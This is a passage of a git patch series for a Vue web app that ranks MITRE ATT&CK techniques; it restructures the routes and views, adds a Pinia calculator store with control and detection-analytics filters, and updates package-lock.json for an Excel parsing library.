bg-ctid-light-purple; } diff --git a/src/router/index.ts b/src/router/index.ts index f188830..a17bd05 100644 --- a/src/router/index.ts +++ b/src/router/index.ts @@ -1,10 +1,10 @@ import { createRouter, createWebHistory } from "vue-router"; -import HomePage from "@/components/HomePage.vue"; -import MethodologyPage from "@/components/MethodologyPage.vue"; -import TopTen from "@/components/TopTen.vue"; -import HelpPage from "@/components/HelpPage.vue"; -import CalculatorPage from "@/components/CalculatorPage.vue"; - +import HomePage from "@/views/HomePage.vue"; +import MethodologyPage from "@/views/MethodologyPage.vue"; +import TopTen from "@/views/TopTen.vue"; +import HelpPage from "@/views/HelpPage.vue"; +import TopTenResults from "../views/TopTenResults.vue"; +import CalculatorPage from "../views/CalculatorPage.vue"; const routes = [ { path: "/", @@ -31,6 +31,11 @@ const routes = [ name: "top-10-lists", component: TopTen, }, + { + path: "/calculator/results", + name: "calculator-results", + component: TopTenResults, + }, ]; const router = createRouter({ diff --git a/src/stores/calculator.store.ts b/src/stores/calculator.store.ts new file mode 100644 index 0000000..e799783 --- /dev/null +++ b/src/stores/calculator.store.ts @@ -0,0 +1,75 @@ +import { defineStore } from "pinia"; +import json from "../data/TopAttackTechniques.json"; + +export const useCalculatorStore = defineStore("calculator", { + state: () => ({ + myJson: json, + techniques: [], + activeFiltersObj: { + nist: [], + cis: [], + detection: [], + os: [], + }, + // todo: set NIST, CIS, and OS options from the technique data + filterPropertiesObj: [ + { + id: "nist", + label: "NIST 800-53 Controls", + options: [{ id: "test", name: "Test", value: false }], + }, + { + id: "cis", + label: "CIS Security Controls", + options: [{ id: "test", name: "Test", value: false }], + }, + { + id: "detection", + label: "Detection Analytics", + options: [ + { id: "has_car", name: "CAR", value: false }, + { id: "has_es_siem", name: "Elastic Search SIEM", value: false }, + { id: "has_sigma", name: "Sigma", value: false }, + { id: "has_splunk", name: "Splunk", value: false }, + ], + }, + { + id: "os", + label: "Operating Systems", + options: [{ id: "test", name: "Test", value: false }], + }, + ], + systemScoreObj: { + network: { label: "None", value: 1 }, + process: { label: "None", value: 1 }, + file: { label: "None", value: 1 }, + cloud: { label: "None", value: 1 }, + hardware: { label: "None", value: 1 }, + }, + }), + getters: { + activeFilters(state) { + return state.activeFiltersObj; + }, + filterProperties(state) { + return state.filterPropertiesObj; + }, + systemScore(state) { + return state.systemScoreObj; + }, + }, + actions: { + updateActiveFilters(filterValues) { + this.activeFiltersObj = filterValues; + }, + updateSystemScores(scores) { + this.systemScoreObj = scores; + }, + setTechniques() { + this.techniques = this.myJson; + }, + removeTechnique(index) { + this.techniques.splice(index, 1); + }, + }, +}); diff --git a/src/views/CalculatorPage.vue b/src/views/CalculatorPage.vue new file mode 100644 index 0000000..327dd69 --- /dev/null +++ b/src/views/CalculatorPage.vue @@ -0,0 +1,65 @@ + + + + + \ No newline at end of file diff --git a/src/components/HelpPage.vue b/src/views/HelpPage.vue similarity index 100% rename from src/components/HelpPage.vue rename to src/views/HelpPage.vue diff --git a/src/components/HomePage.vue b/src/views/HomePage.vue similarity index 93% rename from src/components/HomePage.vue rename to src/views/HomePage.vue index 6312e41..f05ee06 100644 --- a/src/components/HomePage.vue +++ b/src/views/HomePage.vue @@ -44,7 +44,7 @@ Prevalence.

- +
@@ -55,7 +55,7 @@ to your system.

- +
@@ -71,8 +71,7 @@ + + diff --git a/tailwind.config.js b/tailwind.config.js index b18754f..62ab090 100644 --- a/tailwind.config.js +++ b/tailwind.config.js @@ -6,10 +6,12 @@ module.exports = { extend: { colors: { ctid: { - "primary-purple": "#5C6FC6", navy: "#212C5E", black: "#0B2338", - "light-purple": "#BCA9DD", + "primary-purple": "#7450B2", + "light-purple": "#CEBEEA", + blue: "#005B94", + "dark-navy": "#0B2338", }, }, }, From b25a4d4f4458a8dc81476dde11b4aa29f67687d2 Mon Sep 17 00:00:00 2001 From: Allison Robbins Date: Thu, 25 Apr 2024 16:28:11 -0400 Subject: [PATCH 05/21] TAT-139 Load ATT&CK data from Calculator spreadsheet into application (#12) * feat(TAT-139): set up script to parse technique and score data from Calculator spreadsheet * refactor(TAT-139): clean up console log, update some object types * feat(TAT-139): parse mitigations to add to technique JSON * refactor(TAT-139): remove unused code * refactor(TAT-139): restructure build scripts to fix lint error * feat(TAT-139): set filter options on calculator page from technique values * refactor(TAT-139): restructure code in update_techniques to utilize asyn/await and add detection to subtechnique description * refactor(TAT-139): define object types for calculator store * refactor(TAT-139): add type definitions in new file, remove setTechniques() function * refactor(TAT-139): fix spread operator error --------- Co-authored-by: arobbins --- package-lock.json | 1152 +- package.json | 4 +- scripts/.eslintrc.cjs | 5 + scripts/update_techniques.js | 137 + src/components/CalculatorFilters.vue | 1 + src/components/TopTenDetails.vue | 6 + src/data/Calculator.xlsx | Bin 755028 -> 1654661 bytes src/data/DataTypes.ts | 41 + src/data/Techniques.json | 19366 +++++++++++++++++++++++++ src/stores/calculator.store.ts | 97 +- src/stores/example.store.ts | 6 - src/views/TopTenResults.vue | 1 - 12 files changed, 20433 insertions(+), 383 deletions(-) create mode 100644 scripts/.eslintrc.cjs create mode 100644 scripts/update_techniques.js create mode 100644 src/data/DataTypes.ts create mode 100644 src/data/Techniques.json delete mode 100644 src/stores/example.store.ts diff --git a/package-lock.json b/package-lock.json index cbc8760..f4a62aa 100644 --- a/package-lock.json +++ b/package-lock.json @@ -9,6 +9,7 @@ "version": "0.0.0", "dependencies": { "downloadjs": "^1.4.7", + "exceljs": "^4.4.0", "marked": "^12.0.1", "pinia": "^2.0.29", "primeicons": "^7.0.0", @@ -55,54 +56,6 @@ "node": ">=6.0.0" } }, - "node_modules/@esbuild/android-arm": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.18.20.tgz", - "integrity": "sha512-fyi7TDI/ijKKNZTUJAQqiG5T7YjJXgnzkURqmGj13C6dCqckZBLdl4h7bkhHt/t0WP+zO9/zwroDvANaOqO5Sw==", - "cpu": [ - "arm" - ], - "dev": true, - "optional": true, - "os": [ - "android" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/android-arm64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.18.20.tgz", - "integrity": "sha512-Nz4rJcchGDtENV0eMKUNa6L12zz2zBDXuhj/Vjh18zGqB44Bi7MBMSXjgunJgjRhCmKOjnPuZp4Mb6OKqtMHLQ==", - "cpu": [ - "arm64" - ], - "dev": true, - "optional": true, - "os": [ - "android" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/android-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.18.20.tgz", - "integrity": "sha512-8GDdlePJA8D6zlZYJV/jnrRAi6rOiNaCC/JclcXpB+KIuvfBN4owLtgzY2bsxnx666XjJx2kDPUmnTtR8qKQUg==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "android" - ], - "engines": { - "node": ">=12" - } - }, "node_modules/@esbuild/darwin-arm64": { "version": "0.18.20", "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.18.20.tgz", @@ -119,294 +72,6 @@ "node": ">=12" } }, - "node_modules/@esbuild/darwin-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.18.20.tgz", - "integrity": "sha512-pc5gxlMDxzm513qPGbCbDukOdsGtKhfxD1zJKXjCCcU7ju50O7MeAZ8c4krSJcOIJGFR+qx21yMMVYwiQvyTyQ==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/freebsd-arm64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.18.20.tgz", - "integrity": "sha512-yqDQHy4QHevpMAaxhhIwYPMv1NECwOvIpGCZkECn8w2WFHXjEwrBn3CeNIYsibZ/iZEUemj++M26W3cNR5h+Tw==", - "cpu": [ - "arm64" - ], - "dev": true, - "optional": true, - "os": [ - "freebsd" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/freebsd-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.18.20.tgz", - "integrity": "sha512-tgWRPPuQsd3RmBZwarGVHZQvtzfEBOreNuxEMKFcd5DaDn2PbBxfwLcj4+aenoh7ctXcbXmOQIn8HI6mCSw5MQ==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "freebsd" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-arm": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.18.20.tgz", - "integrity": "sha512-/5bHkMWnq1EgKr1V+Ybz3s1hWXok7mDFUMQ4cG10AfW3wL02PSZi5kFpYKrptDsgb2WAJIvRcDm+qIvXf/apvg==", - "cpu": [ - "arm" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-arm64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.18.20.tgz", - "integrity": "sha512-2YbscF+UL7SQAVIpnWvYwM+3LskyDmPhe31pE7/aoTMFKKzIc9lLbyGUpmmb8a8AixOL61sQ/mFh3jEjHYFvdA==", - "cpu": [ - "arm64" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-ia32": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.18.20.tgz", - "integrity": "sha512-P4etWwq6IsReT0E1KHU40bOnzMHoH73aXp96Fs8TIT6z9Hu8G6+0SHSw9i2isWrD2nbx2qo5yUqACgdfVGx7TA==", - "cpu": [ - "ia32" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-loong64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.18.20.tgz", - "integrity": "sha512-nXW8nqBTrOpDLPgPY9uV+/1DjxoQ7DoB2N8eocyq8I9XuqJ7BiAMDMf9n1xZM9TgW0J8zrquIb/A7s3BJv7rjg==", - "cpu": [ - "loong64" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-mips64el": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.18.20.tgz", - "integrity": "sha512-d5NeaXZcHp8PzYy5VnXV3VSd2D328Zb+9dEq5HE6bw6+N86JVPExrA6O68OPwobntbNJ0pzCpUFZTo3w0GyetQ==", - "cpu": [ - "mips64el" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-ppc64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.18.20.tgz", - "integrity": "sha512-WHPyeScRNcmANnLQkq6AfyXRFr5D6N2sKgkFo2FqguP44Nw2eyDlbTdZwd9GYk98DZG9QItIiTlFLHJHjxP3FA==", - "cpu": [ - "ppc64" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-riscv64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.18.20.tgz", - "integrity": "sha512-WSxo6h5ecI5XH34KC7w5veNnKkju3zBRLEQNY7mv5mtBmrP/MjNBCAlsM2u5hDBlS3NGcTQpoBvRzqBcRtpq1A==", - "cpu": [ - "riscv64" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-s390x": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.18.20.tgz", - "integrity": "sha512-+8231GMs3mAEth6Ja1iK0a1sQ3ohfcpzpRLH8uuc5/KVDFneH6jtAJLFGafpzpMRO6DzJ6AvXKze9LfFMrIHVQ==", - "cpu": [ - "s390x" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/linux-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.18.20.tgz", - "integrity": "sha512-UYqiqemphJcNsFEskc73jQ7B9jgwjWrSayxawS6UVFZGWrAAtkzjxSqnoclCXxWtfwLdzU+vTpcNYhpn43uP1w==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "linux" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/netbsd-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.18.20.tgz", - "integrity": "sha512-iO1c++VP6xUBUmltHZoMtCUdPlnPGdBom6IrO4gyKPFFVBKioIImVooR5I83nTew5UOYrk3gIJhbZh8X44y06A==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "netbsd" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/openbsd-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.18.20.tgz", - "integrity": "sha512-e5e4YSsuQfX4cxcygw/UCPIEP6wbIL+se3sxPdCiMbFLBWu0eiZOJ7WoD+ptCLrmjZBK1Wk7I6D/I3NglUGOxg==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "openbsd" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/sunos-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.18.20.tgz", - "integrity": "sha512-kDbFRFp0YpTQVVrqUd5FTYmWo45zGaXe0X8E1G/LKFC0v8x0vWrhOWSLITcCn63lmZIxfOMXtCfti/RxN/0wnQ==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "sunos" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/win32-arm64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.18.20.tgz", - "integrity": "sha512-ddYFR6ItYgoaq4v4JmQQaAI5s7npztfV4Ag6NrhiaW0RrnOXqBkgwZLofVTlq1daVTQNhtI5oieTvkRPfZrePg==", - "cpu": [ - "arm64" - ], - "dev": true, - "optional": true, - "os": [ - "win32" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/win32-ia32": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.18.20.tgz", - "integrity": "sha512-Wv7QBi3ID/rROT08SABTS7eV4hX26sVduqDOTe1MvGMjNd3EjOz4b7zeexIR62GTIEKrfJXKL9LFxTYgkyeu7g==", - "cpu": [ - "ia32" - ], - "dev": true, - "optional": true, - "os": [ - "win32" - ], - "engines": { - "node": ">=12" - } - }, - "node_modules/@esbuild/win32-x64": { - "version": "0.18.20", - "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.18.20.tgz", - "integrity": "sha512-kTdfRcSiDfQca/y9QIkng02avJ+NCaQvrMejlsB3RRv5sE9rRoeBPISaZpKxHELzRxZyLvNts1P27W3wV+8geQ==", - "cpu": [ - "x64" - ], - "dev": true, - "optional": true, - "os": [ - "win32" - ], - "engines": { - "node": ">=12" - } - }, "node_modules/@eslint-community/eslint-utils": { "version": "4.4.0", "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", @@ -463,6 +128,33 @@ "node": "^12.22.0 || ^14.17.0 || >=16.0.0" } }, + "node_modules/@fast-csv/format": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/@fast-csv/format/-/format-4.3.5.tgz", + "integrity": "sha512-8iRn6QF3I8Ak78lNAa+Gdl5MJJBM5vRHivFtMRUWINdevNo00K7OXxS2PshawLKTejVwieIlPmK5YlLu6w4u8A==", + "dependencies": { + "@types/node": "^14.0.1", + "lodash.escaperegexp": "^4.1.2", + "lodash.isboolean": "^3.0.3", + "lodash.isequal": "^4.5.0", + "lodash.isfunction": "^3.0.9", + "lodash.isnil": "^4.0.0" + } + }, + "node_modules/@fast-csv/parse": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/@fast-csv/parse/-/parse-4.3.6.tgz", + "integrity": "sha512-uRsLYksqpbDmWaSmzvJcuApSEe38+6NQZBUsuAyMZKqHxH0g1wcJgsKUvN3WC8tewaqFjBMMGrkHmC+T7k8LvA==", + "dependencies": { + "@types/node": "^14.0.1", + "lodash.escaperegexp": "^4.1.2", + "lodash.groupby": "^4.6.0", + "lodash.isfunction": "^3.0.9", + "lodash.isnil": "^4.0.0", + "lodash.isundefined": "^3.0.1", + "lodash.uniq": "^4.5.0" + } + }, "node_modules/@humanwhocodes/config-array": { "version": "0.11.14", "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.14.tgz", @@ -549,6 +241,11 @@ "integrity": "sha512-5+fP8P8MFNC+AyZCDxrB2pkZFPGzqQWUzpSeuuVLvm8VMcorNYavBqoFcxK8bQz4Qsbn4oUEEem4wDLfcysGHA==", "dev": true }, + "node_modules/@types/node": { + "version": "14.18.63", + "resolved": "https://registry.npmjs.org/@types/node/-/node-14.18.63.tgz", + "integrity": "sha512-fAtCfv4jJg+ExtXhvCkCqUKZ+4ok/JQk01qDKhL5BDDoS3AxKXhV5/MAVUZyQnSEd2GT92fkgZl0pz0Q0AzcIQ==" + }, "node_modules/@types/semver": { "version": "7.5.8", "resolved": "https://registry.npmjs.org/@types/semver/-/semver-7.5.8.tgz", @@ -1345,6 +1042,70 @@ "node": ">= 8" } }, + "node_modules/archiver": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/archiver/-/archiver-5.3.2.tgz", + "integrity": "sha512-+25nxyyznAXF7Nef3y0EbBeqmGZgeN/BxHX29Rs39djAfaFalmQ89SE6CWyDCHzGL0yt/ycBtNOmGTW0FyGWNw==", + "dependencies": { + "archiver-utils": "^2.1.0", + "async": "^3.2.4", + "buffer-crc32": "^0.2.1", + "readable-stream": "^3.6.0", + "readdir-glob": "^1.1.2", + "tar-stream": "^2.2.0", + "zip-stream": "^4.1.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/archiver-utils": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/archiver-utils/-/archiver-utils-2.1.0.tgz", + "integrity": "sha512-bEL/yUb/fNNiNTuUz979Z0Yg5L+LzLxGJz8x79lYmR54fmTIb6ob/hNQgkQnIUDWIFjZVQwl9Xs356I6BAMHfw==", + "dependencies": { + "glob": "^7.1.4", + "graceful-fs": "^4.2.0", + "lazystream": "^1.0.0", + "lodash.defaults": "^4.2.0", + "lodash.difference": "^4.5.0", + "lodash.flatten": "^4.4.0", + "lodash.isplainobject": "^4.0.6", + "lodash.union": "^4.6.0", + "normalize-path": "^3.0.0", + "readable-stream": "^2.0.0" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/archiver-utils/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/archiver-utils/node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/archiver-utils/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, "node_modules/arg": { "version": "5.0.2", "resolved": "https://registry.npmjs.org/arg/-/arg-5.0.2.tgz", @@ -1366,6 +1127,11 @@ "node": ">=8" } }, + "node_modules/async": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", + "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==" + }, "node_modules/autoprefixer": { "version": "10.4.13", "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.13.tgz", @@ -1402,8 +1168,46 @@ "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/big-integer": { + "version": "1.6.52", + "resolved": "https://registry.npmjs.org/big-integer/-/big-integer-1.6.52.tgz", + "integrity": "sha512-QxD8cf2eVqJOOz63z6JIN9BzvVs/dlySa5HGSBH5xtR8dPteIRQnBxxKqkNTiT6jbDTF6jAfrd4oMcND9RGbQg==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/binary": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/binary/-/binary-0.3.0.tgz", + "integrity": "sha512-D4H1y5KYwpJgK8wk1Cue5LLPgmwHKYSChkbspQg5JtVuR5ulGckxfR62H3AE9UDkdMC8yyXlqYihuz3Aqg2XZg==", + "dependencies": { + "buffers": "~0.1.1", + "chainsaw": "~0.1.0" + }, + "engines": { + "node": "*" + } }, "node_modules/binary-extensions": { "version": "2.2.0", @@ -1414,6 +1218,21 @@ "node": ">=8" } }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/bluebird": { + "version": "3.4.7", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.4.7.tgz", + "integrity": "sha512-iD3898SR7sWVRHbiQv+sHUtHnMvC1o3nW5rAcqnq3uOn07DSAppZYUkIGslDz6gXC7HfunPe7YVBgoEJASPcHA==" + }, "node_modules/boolbase": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/boolbase/-/boolbase-1.0.0.tgz", @@ -1424,7 +1243,6 @@ "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" @@ -1470,6 +1288,53 @@ "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" } }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==", + "engines": { + "node": "*" + } + }, + "node_modules/buffer-indexof-polyfill": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/buffer-indexof-polyfill/-/buffer-indexof-polyfill-1.0.2.tgz", + "integrity": "sha512-I7wzHwA3t1/lwXQh+A5PbNvJxgfo5r3xulgpYDB5zckTu/Z9oUK9biouBKQUjEqzaz3HnAT6TYoovmE+GqSf7A==", + "engines": { + "node": ">=0.10" + } + }, + "node_modules/buffers": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/buffers/-/buffers-0.1.1.tgz", + "integrity": "sha512-9q/rDEGSb/Qsvv2qvzIzdluL5k7AaJOTrw23z9reQthrbF7is4CtlT0DXyO1oei2DCp4uojjzQ7igaSHp1kAEQ==", + "engines": { + "node": ">=0.2.0" + } + }, "node_modules/callsites": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", @@ -1504,6 +1369,17 @@ } ] }, + "node_modules/chainsaw": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/chainsaw/-/chainsaw-0.1.0.tgz", + "integrity": "sha512-75kWfWt6MEKNC8xYXIdRpDehRYY/tNSgwKaJq+dbbDcxORuVrrQ+SEHoWsniVn9XPYfP4gmdWIeDk/4YNp1rNQ==", + "dependencies": { + "traverse": ">=0.3.0 <0.4" + }, + "engines": { + "node": "*" + } + }, "node_modules/chalk": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", @@ -1571,12 +1447,26 @@ "node": ">=7.0.0" } }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true + }, + "node_modules/compress-commons": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/compress-commons/-/compress-commons-4.1.2.tgz", + "integrity": "sha512-D3uMHtGc/fcO1Gt1/L7i1e33VOvD4A9hfQLP+6ewd+BvG/gQ84Yh4oftEhAdjSMgBgwGL+jsppT7JYNpo6MHHg==", + "dependencies": { + "buffer-crc32": "^0.2.13", + "crc32-stream": "^4.0.2", + "normalize-path": "^3.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } + }, "node_modules/computeds": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/computeds/-/computeds-0.0.1.tgz", @@ -1586,8 +1476,35 @@ "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" + }, + "node_modules/core-util-is": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", + "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" + }, + "node_modules/crc-32": { + "version": "1.2.2", + "resolved": 